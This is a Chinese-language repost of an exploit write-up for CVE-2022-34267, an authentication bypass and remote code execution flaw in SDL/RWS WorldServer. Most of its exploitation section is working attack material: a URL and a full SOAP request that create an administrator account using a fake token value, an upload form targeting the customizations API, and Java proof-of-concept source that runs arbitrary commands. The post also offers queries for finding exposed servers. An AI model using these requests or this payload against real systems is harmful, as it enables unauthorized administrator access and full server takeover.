[漏洞复现] CVE-2022-34267 SDL WorldServer 身份认证绕过RCE

[漏洞复现] CVE-2022-34267 SDL WorldServer 身份认证绕过RCE
2023-12-27 08:31:16 Author: 不够安全(查看原文) 阅读量:20 收藏

本人非原创漏洞作者，文章仅作为知识分享用

一切直接或间接由于本文所造成的后果与本人无关

如有侵权，联系删除

产品简介

SDL WorldServer 翻译流程管理系统专为本地化项目经理及其团队而设计，用于集中管理、自动化和控制大量的翻译项目，以提供按时、按预算的高质量翻译交付。企业团队可在整个组织内重新获得翻译控制权，并可与多个外部翻译供应商（LSP）高效协作。目前支持许多全球知名品牌的翻译流程，成功简化并加快了其内容从网站到文档到软件的本地化流程。

开发语言：Java官网地址：https://www.rws.com/cn/

空间测绘

回复“CVE-2022-34267”获取空间测绘语句

漏洞描述

在 11.7.3 之前的 RWS WorldServer 中发现了一个问题。添加值为 02 的令牌参数会绕过所有身份验证要求。任意 Java 代码可以通过 .jar 存档上传到 ws-api/v2/customizations/api 端点并执行。

影响版本

SDL WorldServer ≤ 11.7.2.243

漏洞利用

一、添加管理员用户

/ws-legacy/services/UserWSUserManager?method=createUser_&username=testuser&password=testuser@qaz123&firstName=luis&lastName=ladon&userType=Administrator&token=2

或者

POST /ws-legacy/services/UserWSUserManager HTTP/1.1Host: localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5763.212 Safari/537.36 OPR/98.0.4728.119Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=A440950C0CE03EBC83A30F926F0FC3E3Connection: closeSOAPAction: Content-Type: text/xml;charset=UTF-8Content-Length: 856
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:com="http://www.idiominc.org/com.idiominc.webservices.UserWSUserManager">   <soapenv:Header/>   <soapenv:Body>      <com:createUser_ soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">         <token xsi:type="xsd:string">2</token>         <username xsi:type="xsd:string">testuser</username>         <password xsi:type="xsd:string">testuser@qaz123</password>         <firstName xsi:type="xsd:string">luis</firstName>         <lastName xsi:type="xsd:string">ladon</lastName>         <userType xsi:type="xsd:string">Administrator</userType>      </com:createUser_>   </soapenv:Body></soapenv:Envelope>

二、上传jar文件执行命令

上传表单

</!DOCTYPE html><html><head>    <title>file upload</title></head><body><h2>hello</h2>    <form  action="http://xxx.xxx.xxx/ws-api/v2/customizations/api?token=02" method="post" enctype="multipart/form-data">        <input type="file" name="file"/>        <input type="submit" value="Submit" />    </form></body></html>

POC

package com.sdl.lt.worldserver.customizations.newextension;import java.io.IOException;import com.idiominc.wssdk.WSContext;import org.springframework.web.bind.annotation.ResponseBody;import org.springframework.web.bind.annotation.RequestParam;import org.springframework.web.bind.annotation.RequestMapping;import org.springframework.beans.factory.annotation.Autowired;import org.springframework.web.bind.annotation.RestController;import org.springframework.web.bind.annotation.RequestMethod;@RestController@RequestMapping ("/extensions/test")public class NewExtension{        @Autowired        private WSContext context;        @RequestMapping (value = "/clients", method = {RequestMethod.GET})        public String test() throws Exception {        try{        Process p = Runtime.getRuntime)(.exec("INSERT COMMAND HERE");        }        catch (IOException exception){        return "false";        }        return "PoC - Remote Code Execution";        }}

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2022-34267https://www.triskelelabs.com/vulnerabilities-in-rws-worldserver

回复“CVE-2022-34267”获取空间测绘语句

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2OTYzNTExNQ==&mid=2247484668&idx=1&sn=7ff2fe2b71719fdc06a38de72461c499&chksm=cf4c74ca024ae574d94d9242deb50be7613efa05c9967b348fc871cafb817ebbf5ef5989f30e&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh